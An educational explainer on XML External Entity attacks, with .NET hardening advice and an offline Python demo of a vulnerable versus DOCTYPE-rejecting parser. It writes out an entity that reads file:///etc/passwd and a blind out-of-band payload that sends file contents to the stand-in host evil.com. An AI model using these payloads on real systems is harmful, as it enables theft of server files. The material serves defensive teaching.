XML eXternal Entities
Added to the OWASP Top 10 in 2017 (A4:2017-XXE).
Entities, familiar from HTML (&amp;, &lt;), are the usual entry point: a reference such as &name; is replaced by the entity's content when the document is parsed, and that substitution is what triggers the attack.
XML lets the document declare its own entities in the DTD, either inline (an internal entity):
<!ENTITY xml "Extensible Markup Language">
or by reference to something outside the document (an external entity, marked SYSTEM):
<!ENTITY chapter1 SYSTEM "chapter1.txt">
When the parser meets &chapter1; it expands the reference: it fetches the SYSTEM identifier (a file path or URL, resolved relative to the document) and substitutes the contents in place, exactly as it would for &xml;.
So whoever controls the XML also controls what the parser reads at expansion time: declare an entity whose SYSTEM identifier points at a local file or an internal URL, reference it in a field the application reflects, and the file contents come back in the response (or in an error message). The parser does the fetching with the server's own permissions.
Out-of-band (blind) variant, using parameter entities (% entities, usable only inside the DTD). The %file; referenced here is assumed to have been declared just before it, e.g. <!ENTITY % file SYSTEM "file:///etc/passwd">:
<!ENTITY % all "<!ENTITY send SYSTEM 'http://evil.com/evil.html?payload=%file;'>" > %all;
A parameter entity reference inside an entity value is not allowed in the internal subset, so this fragment has to live in an attacker-hosted DTD that the parser is told to load (e.g. <!ENTITY % dtd SYSTEM "http://evil.com/evil.dtd"> %dtd;). %all; then declares send with the file contents baked into its URL, and a later &send; makes the server request that URL, so the data reaches evil.com even when the application never echoes the parsed document.
Threat Model Questions to Ask
- Does your server's XML parser process DTDs at all? This is where the .NET defaults bit: in .NET Framework before 4.5.2, XmlDocument and XmlTextReader resolved external entities by default (XmlDocument's XmlResolver is an XmlUrlResolver unless set to null), so untouched default parsing was exploitable; from 4.5.2 on they are safe by default. On older targets, or whenever a resolver has been set explicitly, set XmlDocument.XmlResolver = null and XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit.
- Do you allow external entities? (You shouldn't.)
- Do you validate untrusted input? (You always should.)
DO: update parsers; disable DTD processing, and with it external entities, in every parser the application uses, not just the obvious one; validate untrusted input (a DOCTYPE in user-supplied XML is itself a red flag); and if DTDs are genuinely needed, set a resolver policy that restricts which URLs may be resolved (ideally none, otherwise an allow-list).
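The entity expansion described above (internal entity, then SYSTEM entities fetched from outside the document) and the "disable DTD" control from the DO list, as an added example that is not part of the original page. It uses Python's stdlib expat parser as a stand-in for any parser whose resolver is switched on; the FAKE_FILES table, the ATTACK and BENIGN documents, and the function names are constructed for the example, and no file or network access takes place.

```python
import xml.parsers.expat as expat

# Constructed stand-in for the files and URLs a real resolver would fetch.
# Nothing is read from disk or the network; the example runs offline.
FAKE_FILES = {
    "chapter1.txt": "Chapter 1: In the beginning...",
    "file:///etc/passwd": "root:x:0:0:root:/root:/bin/bash",
}

# Constructed attacker document: one internal entity (as on the page) plus two
# SYSTEM entities, one pointing at a file the application never meant to expose.
ATTACK = b"""<?xml version="1.0"?>
<!DOCTYPE book [
  <!ENTITY xml "Extensible Markup Language">
  <!ENTITY chapter1 SYSTEM "chapter1.txt">
  <!ENTITY secret SYSTEM "file:///etc/passwd">
]>
<book>&xml;|&chapter1;|&secret;</book>"""

BENIGN = b"<book>Hello &amp; welcome</book>"


class DtdRejected(Exception):
    """Untrusted XML carried a DOCTYPE, so it could declare entities."""


def parse_resolving_entities(xml_bytes):
    """Vulnerable parse: entity references are expanded and SYSTEM ids are
    fetched (here from FAKE_FILES). This models a parser whose resolver is
    on, e.g. .NET XmlDocument before 4.5.2 with its default XmlUrlResolver."""
    text = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append

    def resolve_external(context, base, system_id, public_id):
        # The fetch step: look the SYSTEM id up, then parse its content as the
        # entity body so it lands in the document exactly like &xml; does.
        body = FAKE_FILES.get(system_id, "")
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(body, True)
        return 1  # non-zero tells expat the entity was handled

    parser.ExternalEntityRefHandler = resolve_external
    parser.Parse(xml_bytes, True)
    return "".join(text)


def parse_rejecting_dtd(xml_bytes):
    """Hardened parse: refuse any DOCTYPE before a single entity can be
    declared (the 'disable DTD' control; defusedxml hardens the stdlib the
    same way), and never resolve a SYSTEM id even if one is somehow reached."""
    text = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = text.append

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRejected("DOCTYPE %r is not allowed in untrusted XML" % name)

    def reject_external(context, base, system_id, public_id):
        return 0  # zero makes expat abort with XML_ERROR_EXTERNAL_ENTITY_HANDLING

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.ExternalEntityRefHandler = reject_external
    parser.Parse(xml_bytes, True)
    return "".join(text)


if __name__ == "__main__":
    print("vulnerable :", parse_resolving_entities(ATTACK))
    print("benign     :", parse_rejecting_dtd(BENIGN))
    try:
        parse_rejecting_dtd(ATTACK)
    except DtdRejected as err:
        print("hardened   :", err)
```

The vulnerable path returns the "chapter" and the fake /etc/passwd line inline with the legitimate text, which is the whole attack: the application asked for a document and got the server's files. The hardened path fails at the DOCTYPE, so no entity is ever declared, and the second handler is only a backstop in case DTD processing is re-enabled somewhere else in the pipeline.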